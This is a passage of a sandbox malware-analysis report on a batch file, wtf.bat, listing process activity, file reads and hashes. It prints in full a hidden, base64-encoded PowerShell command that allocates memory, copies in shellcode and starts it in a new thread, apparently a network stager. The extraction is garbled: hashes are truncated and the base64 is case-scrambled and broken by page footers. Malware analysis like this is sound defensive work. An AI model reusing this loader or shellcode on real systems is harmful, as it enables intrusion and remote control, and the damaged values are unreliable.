C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DYF4J0F10SJFZIWS3XI2.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 016 Entropy (bit): Encrypted: MD5: 5D769E55DE2CB077F904D6FB4007EF4 SHA1: 9F45FF074C1259EC6C316F05FE97051A10 SHA-256: 3DCD539A20C463CD DF250ABC993190C7CAD E76D9D Copyright Joe Security LLC 201 Page 11 of 21

12 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DYF4J0F10SJFZIWS3XI2.temp SHA-512: Malicious: Reputation: 001E0E5DC92EB6CB2B7ECD2E596DE5BEF705B0AB2EE906B924CC126DE7EF46FE005DBC32AD6A66A90 905D2D1BEF75C6EDE239EB52FEC2F516435C74 low C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ITYUMQ4GZ7DU1K6VID7W.temp Process: File Type: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe data Size (bytes): 016 Entropy (bit): Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: Reputation: 5D769E55DE2CB077F904D6FB4007EF4 9F45FF074C1259EC6C316F05FE97051A10 3DCD539A20C463CD DF250ABC993190C7CAD E76D9D 001E0E5DC92EB6CB2B7ECD2E596DE5BEF705B0AB2EE906B924CC126DE7EF46FE005DBC32AD6A66A90 905D2D1BEF75C6EDE239EB52FEC2F516435C74 low Contacted Domains/Contacted IPs Contacted Domains No contacted domains info Contacted IPs No contacted IP infos Static File Info General File type: Entropy (bit): TrID: File name: File size: 6703 MD5: SHA1: SHA256: SHA512: File Content Preview: ASCII text, with very long lines, with no line terminators wtf.bat f6a9a366ea3fb b4 ccc b23daefd905b6fdd545917a f0d57a1406d97a372fa0c4df9a79aa742a9f624eab5e776 5aa c1ba79 39b442232ba2c1fcf9da140fc99ee544560c2a7b24 d2ea6d306d7b213a967413a7907a25dba6d fef2 073b169d2cc5ad1e d4 powershell -nop -win Hidden -noni -enc JAAxACAAPQA gaccajabjacaapqagaccajwbbaeqababsaekabq BwAGAcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALg BkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMA dabhahqaaqbjacaazqb4ahqazqbyag4aiabjag 4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQB sagwabwbjacga File Icon Network Behavior Copyright Joe Security LLC 201 Page 12 of 21

13 No network behavior found Code Manipulations Statistics Behavior cmd.exe powershell.exe powershell.exe csc.exe Click to jump to process System Behavior Analysis Process: cmd.exe PID: 3464 Parent PID: 302 General Start time: 1:33:46 Start date: 19/05/201 Path: Wow64 process (32bit): Commandline: Imagebase: File size: MD5 hash: Has administrator privileges: Programmed in: Reputation: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\wtf.bat' ' 0x4a bytes AD7B9C1403B52BC532FBA594342B9 true C, C++ or other language high File Activities File Read File Path Offset Length Completion Count Address C:\Users\user\Desktop\wtf.bat unknown 191 success or wait 1 4A514DE3 ReadFile C:\Users\user\Desktop\wtf.bat unknown 191 end of file 1 4A514DE3 ReadFile C:\Users\user\Desktop\wtf.bat unknown 191 end of file 1 4A514DE3 ReadFile C:\Users\user\Desktop\wtf.bat unknown 191 end of file 1 4A514DE3 ReadFile Symbol Copyright Joe Security LLC 201 Page 13 of 21

14 Analysis Process: powershell.exe PID: 3492 Parent PID: 3464 General Start time: 1:33:47 Start date: 19/05/201 Path: Wow64 process (32bit): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Commandline: powershell -nop -win Hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgAC cajwbbaeqababsaekabqbwagacgb0acgaigbraguacgbuaguabaazadialg BkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AH QAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbw BjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG 4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAGAYw BhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AG UAYwB0ACkAOwBbAEQAbABsAEkAbQBwAGAcgB0ACgAIgBrAGUAcgBuAGUAbA AzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjAC AAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaA ByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AH QAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUw BpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAH IAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQ ByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAGAbgBGAGwAYQBnAH MALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWw BEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiAC kaxqbwahuaygbsagkaywagahmadabhahqaaqbjacaazqb4ahqazqbyag4aia BJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAG UAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAGAdQ BuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG 0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQ BtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAF caaqbuadmamgbgahuabgbjahqaaqbvag4acwagac0acabhahmacwb0aggacg B1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjAC AAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAMgAsADAAeAAwADAALA AwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAOAA5ACwAMAB4AG UANQAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4ADYANAAsADAAeAA4AGIALA AwAHgANQAwACwAMAB4ADMAMAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4AD AAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAA4AGIALA AwAHgANwAyACwAMAB4ADIAOAAsADAAeAAwAGYALAAwAHgAYgA3ACwAMAB4AD QAYQAsADAAeAAyADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALA AwAHgAMwBjACwAMAB4ADYAMQAsADAAeAA3AGMALAAwAHgAMAAyACwAMAB4AD IAYwAsADAAeAAyADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALA AwAHgAMAAxACwAMAB4AGMANwAsADAAeABlADIALAAwAHgAZgAyACwAMAB4AD UAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALA AwAHgAOABiACwAMAB4ADQAYQAsADAAeAAzAGMALAAwAHgAOABiACwAMAB4AD QAYwAsADAAeAAxADEALAAwAHgANwA4ACwAMAB4AGUAMwAsADAAeAA0ADgALA AwAHgAMAAxACwAMAB4AGQAMQAsADAAeAA1ADEALAAwAHgAOABiACwAMAB4AD UAOQAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALA AwAHgANAA5ACwAMAB4ADEAOAAsADAAeABlADMALAAwAHgAMwBhACwAMAB4AD QAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALA AwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4AG MAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALA AwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA2ACwAMAB4AD AAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALA AwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADQALAAwAHgANQA4ACwAMAB4AD gaygasadaaeaa1adgalaawahgamga0acwamab4adaamqasadaaeabkadmala AwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4AD gaygasadaaeaa1adgalaawahgamqbjacwamab4adaamqasadaaeabkadmala AwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AG QAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALA AwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4AD UAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1AGYALA AwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AG UAYgAsADAAeAA4AGQALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAAzADMALA AwAHgAMwAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4AD canwasadaaeaa3admalaawahgamwayacwamab4aduazgasadaaeaa1adqala AwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4AD AANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4AGIAOAAsADAAeAA5ADAALA AwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgA5ACwAMAB4AG MANAAsADAAeAA1ADQALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAAyADkALA AwAHgAOAAwACwAMAB4ADYAYgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4AG QANQAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADYAOAAsADAAeABjADAALA AwAHgAYQA4ACwAMAB4ADAAMQAsADAAeABhAGMALAAwAHgANgA4ACwAMAB4AD AAMgAsADAAeAAwADAALAAwAHgAMAAxACwAMAB4AGIAYQAsADAAeAA4ADkALA AwAHgAZQA2ACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4AD UAMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALA AwAHgANgA4ACwAMAB4AGUAYQAsADAAeAAwAGYALAAwAHgAZABmACwAMAB4AG UAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANwAsADAAeAA2AGEALA AwAHgAMQAwACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4AD kaoqasadaaeabhadualaawahganwa0acwamab4adyamqasadaaeabmagyala AwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AD AAYwAsADAAeABmAGYALAAwAHgANABlACwAMAB4ADAAOAAsADAAeAA3ADUALA AwAHgAZQBjACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AG EAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALA AwAHgAMAAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQA2ACwAMAB4AD UANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALA Copyright Joe Security LLC 201 AwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOABiACwAMAB4AD Page 14 of 21

15 AwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOABiACwAMAB4AD MANgAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALA AwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQA2ACwAMAB4AD YAYQAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALA AwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4AD kamwasadaaeaa1admalaawahgangbhacwamab4adaamaasadaaeaa1adyala AwAHgANQAzACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AG QAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALA AwAHgAMAAxACwAMAB4AGMAMwAsADAAeAAyADkALAAwAHgAYwA2ACwAMAB4AD canqasadaaeablagualaawahgaywazadsajabzagkaegblacaapqagadaaea AxADAAMAAwADsAaQBmACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoACAALQBnAH QAIAAwAHgAMQAwADAAMAApAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATA BlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAG wababvagmakaawacwamab4adeamaawadaalaakahmaaqb6agualaawahgana AwACkAOwBmAGAcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAH MAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOg A6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAE kabgb0admamgaoackakwakagkakqasacaajabzagmawwakagkaxqasacaamq ApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsAD AALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdA BhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZwBxACAAPQAgAF sauwb5ahmadablag0algbdagabgb2aguacgb0af0aoga6afqabwbcageacw BlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC 4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdA BCAHkAdABlAHMAKAAkADEAKQApADsAaQBmACgAWwBJAG4AdABQAHQAcgBdAD oaogbtagkaegblacaalqblaheaiaa4ackaewakahgaoaa2acaapqagacqazq BuAHYAOgBTAHkAcwB0AGUAbQBSAGAbwB0ACAAKwAgACIAXABzAHkAcwB3AG AdwA2ADQAXABXAGkAbgBkAGAdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXA B2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABjAG0AZAAgAD 0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACAAIgA7AGkAZQ B4ACAAIgAmACAAJAB4ADgANgAgACQAYwBtAGQAIAAkAGcAcQAiAH0AZQBsAH MAZQB7ACQAYwBtAGQAIAA9ACAAIgAtAG4AbwBwACAALQBuAGAbgBpACAALQ BlAG4AYwAiADsAaQBlAHgAIAAiACYAIABwAGAdwBlAHIAcwBoAGUAbABsAC AAJABjAG0AZAAgACQAZwBxACIAOwB9AA== Imagebase: File size: MD5 hash: Has administrator privileges: Programmed in: Reputation: 0x222d bytes 92F44E405DB16AC55D97E3BFE3B132FA true.net C# or VB.NET high File Activities File Path Access Attributes Options Completion Count Address Symbol Old File Path New File Path Completion Count Address Symbol File Path Offset Length Value Ascii Completion Count Address Symbol File Read File Path Offset Length Completion Count Address C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 4095 success or wait 1 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 6304 success or wait 3 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 4106 success or wait 1 6C9EC01C unknown C:\Windows\Microsoft.NET\Framework\v \CONFIG\security.config.cch unknown 4 success or wait 1 6C9AAC6F ReadFile C:\Windows\Microsoft.NET\Framework\v \CONFIG\enterprisesec.config.cch unknown 4 success or wait 1 6C9AAC6F ReadFile C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 4095 success or wait 1 6C9EF210 ReadFile C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 6304 success or wait 3 6C9EF210 ReadFile C:\Windows\Microsoft.NET\Framework\v \CONFIG\machine.config unknown 4106 success or wait 1 6C9EF210 ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml unknown 71 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml unknown 542 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml unknown 7 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml unknown 4096 success or wait ReadFile Copyright Joe Security LLC 201 Page 15 of 21 Symbol

16 File Path Offset Length Completion Count C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml unknown 310 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml unknown 50 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml unknown 201 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml unknown 409 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml unknown 44 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml unknown 4096 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml unknown 4096 success or wait ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml unknown 360 end of file ReadFile C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml unknown 4096 end of file ReadFile C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Management.Automation\ bf356ad364e35\System.Management.Automation.dll Address unknown 4096 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll unknown 4096 success or wait 1 6CA69FDE unknown C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll C:\Windows\assembly\GAC_MSIL\System\ b77a5c561934e09\system.dll Symbol Analysis Process: powershell.exe PID: 3544 Parent PID: 3492 General Start time: 1:33:49 Start date: 19/05/201 Path: Wow64 process (32bit): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -noni -enc JAB jacaapqagaccawwbeagwababjag0acabvahiadaaoaciaawblahiabgblagw AMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwA gaguaeab0aguacgbuacaasqbuahqauab0ahiaiabwagkacgb0ahuayqbsaee AbABsAGAYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAA gahuaaqbuahqaiabkahcauwbpahoazqasacaadqbpag4adaagagyababbagw AbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAB yagadablagmadaapadsawwbeagwababjag0acabvahiadaaoaciaawblahi AbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB 0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQ AZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQB kaeeadab0ahiaaqbiahuadablahmalaagahuaaqbuahqaiabkahcauwb0age AYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdAB BAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0 AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgB sageazwbzacwaiabjag4adabqahqacgagagwacabuaggacgblageazabjagq AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZAB sagwaigapaf0acab1agiababpagmaiabzahqayqb0agkaywagaguaeab0agu AcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAB yacaazablahmadaasacaadqbpag4adaagahmacgbjacwaiab1agkabgb0aca AYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQA gac0abqblag0aygblahiarablagyaaqbuagkadabpagabgagacqaywagac0 ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwB lacaavwbpag4amwayaeyadqbuagmadabpagabgbzacaalqbwageacwbzahq AaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB zagmaiaa9acaamab4agyaywasadaaeabladgalaawahgaoaayacwamab4ada AMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAA Copyright Joe Security LLC 201 wahgazqa1acwamab4admamqasadaaeabjadaalaawahganga0acwamab4adg Page 16 of 21

17 wahgazqa1acwamab4admamqasadaaeabjadaalaawahganga0acwamab4adg AYgAsADAAeAA1ADAALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAA wahgamabjacwamab4adgaygasadaaeaa1adialaawahgamqa0acwamab4adg AYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAA wahganabhacwamab4adiangasadaaeaazadealaawahgazgbmacwamab4age AYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAA wahgamgbjacwamab4adiamaasadaaeabjadealaawahgaywbmacwamab4ada AZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADIALAA wahganqayacwamab4aduanwasadaaeaa4agialaawahganqayacwamab4ade AMAAsADAAeAA4AGIALAAwAHgANABhACwAMAB4ADMAYwAsADAAeAA4AGIALAA wahganabjacwamab4adeamqasadaaeaa3adgalaawahgazqazacwamab4adq AOAAsADAAeAAwADEALAAwAHgAZAAxACwAMAB4ADUAMQAsADAAeAA4AGIALAA wahganqa5acwamab4adiamaasadaaeaawadealaawahgazaazacwamab4adg AYgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAA wahganaa5acwamab4adgaygasadaaeaazadqalaawahgaoabiacwamab4ada AMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALAA wahgaywaxacwamab4agmazgasadaaeaawagqalaawahgamaaxacwamab4agm ANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAA wahgamaazacwamab4adcazaasadaaeabmadgalaawahgamwbiacwamab4adc AZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUANAAsADAAeAA1ADgALAA wahgaoabiacwamab4aduaoaasadaaeaayadqalaawahgamaaxacwamab4agq AMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAA wahgaoabiacwamab4aduaoaasadaaeaaxagmalaawahgamaaxacwamab4agq AMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAA wahgazaawacwamab4adgaoqasadaaeaa0adqalaawahgamga0acwamab4adi ANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAA wahganqbhacwamab4aduamqasadaaeabmagyalaawahgazqawacwamab4adu AZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAA wahgazqbiacwamab4adgazaasadaaeaa1agqalaawahganga4acwamab4adm AMwAsADAAeAAzADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAA wahganwa3acwamab4adcamwasadaaeaazadialaawahganqbmacwamab4adu ANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAA wahgamaa3acwamab4agyazgasadaaeabkadualaawahgayga4acwamab4adk AMAAsADAAeAAwADEALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyADkALAA wahgaywa0acwamab4aduanaasadaaeaa1adaalaawahganga4acwamab4adi AOQAsADAAeAA4ADAALAAwAHgANgBiACwAMAB4ADAAMAAsADAAeABmAGYALAA wahgazaa1acwamab4adyayqasadaaeaawagealaawahganga4acwamab4agm AMAAsADAAeABhADgALAAwAHgAMAAxACwAMAB4AGEAYwAsADAAeAA2ADgALAA wahgamaayacwamab4adaamaasadaaeaawadealaawahgaygbhacwamab4adg AOQAsADAAeABlADYALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAA wahganqawacwamab4adqamaasadaaeaa1adaalaawahganaawacwamab4adu AMAAsADAAeAA2ADgALAAwAHgAZQBhACwAMAB4ADAAZgAsADAAeABkAGYALAA wahgazqawacwamab4agyazgasadaaeabkadualaawahgaoqa3acwamab4ady AYQAsADAAeAAxADAALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAA wahgaoqa5acwamab4ageanqasadaaeaa3adqalaawahgangaxacwamab4agy AZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAA wahgamabjacwamab4agyazgasadaaeaa0agualaawahgamaa4acwamab4adc ANQAsADAAeABlAGMALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAA wahgayqayacwamab4aduangasadaaeabmagyalaawahgazaa1acwamab4ady AYQAsADAAeAAwADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADYALAA wahganqa3acwamab4adyaoaasadaaeaawadialaawahgazaa5acwamab4agm AOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4AGIALAA wahgamwa2acwamab4adyayqasadaaeaa0adaalaawahganga4acwamab4ada AMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADYALAA wahgangbhacwamab4adaamaasadaaeaa2adgalaawahganqa4acwamab4age ANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAA wahgaoqazacwamab4aduamwasadaaeaa2agealaawahgamaawacwamab4adu ANgAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAA wahgazaa5acwamab4agmaoaasadaaeaa1agyalaawahgazgbmacwamab4agq ANQAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADIAOQAsADAAeABjADYALAA 